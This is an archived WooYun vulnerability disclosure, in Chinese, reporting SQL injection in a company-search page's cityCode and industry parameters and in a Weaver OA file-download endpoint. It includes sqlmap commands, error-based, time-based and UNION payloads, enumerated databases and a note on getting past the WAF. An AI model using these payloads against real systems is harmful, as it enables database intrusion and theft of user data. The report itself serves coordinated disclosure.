乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-27: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
WAF没起作用
有前辈提过 http://**.**.**.**/bugs/wooyun-2010-0143184 里面的注入点已修复,看来厂商态度积极但是还有两处疏漏1.
sqlmap.py -u "http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2*" --random-agent --dbms=MySQL参数 cityCode 可注入
有WAF,Linux下注入被ban掉
不知道为什么Windows下注入就正常了
Parameter: #1* (URI) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2' AND (SELECT 3214 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(3214=3214,1))),0x71766b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xxTE'='xxTE Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2' AND (SELECT * FROM (SELECT(SLEEP(5)))Alit) AND 'nRcI'='nRcI Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=-7300' UNION ALL SELECT CONCAT(0x7171786b71,0x5757627458766a6a5a696b5456784d424853556b456968634f67726f7979636c426e76657a415562,0x71766b7171)-- ---- the back-end DBMS is MySQLweb server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL >= 5.0.0
2.
http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2&industry=160000*参数 industry 可注入
Parameter: industry (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2&industry=160000' AND (SELECT 5023 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT (ELT(5023=5023,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hZyG'='hZyG Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2&industry=160000' AND (SELECT * FROM (SELECT(SLEEP(5)))GvXD) AND 'IoVM'='IoVM Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2&industry=-8180' UNION ALL SELECT CONCAT(0x7176707671,0x466352525a63524475506668414d6f43676c68536871437255544c445977776958704d6d676e4164,0x716a7a6a71)--
current user: 'gqmysql@localhost'available databases [4]:[*] guquan[*] information_schema[*] mysql[*] test
5000多用户
3.http://**.**.**.**,oa系统用的泛微的,存在注入
sqlmap.py -u "http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=10" --current-userParameter: fileid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fileid=10 AND 4637=4637--- the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2008current user: 'sa'available databases [7]:[*] ecology[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
危害等级:高
漏洞Rank:10
确认时间:2015-12-01 17:12
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给浙江分中心,由浙江分中心后续协调网站管理单位处置。
暂无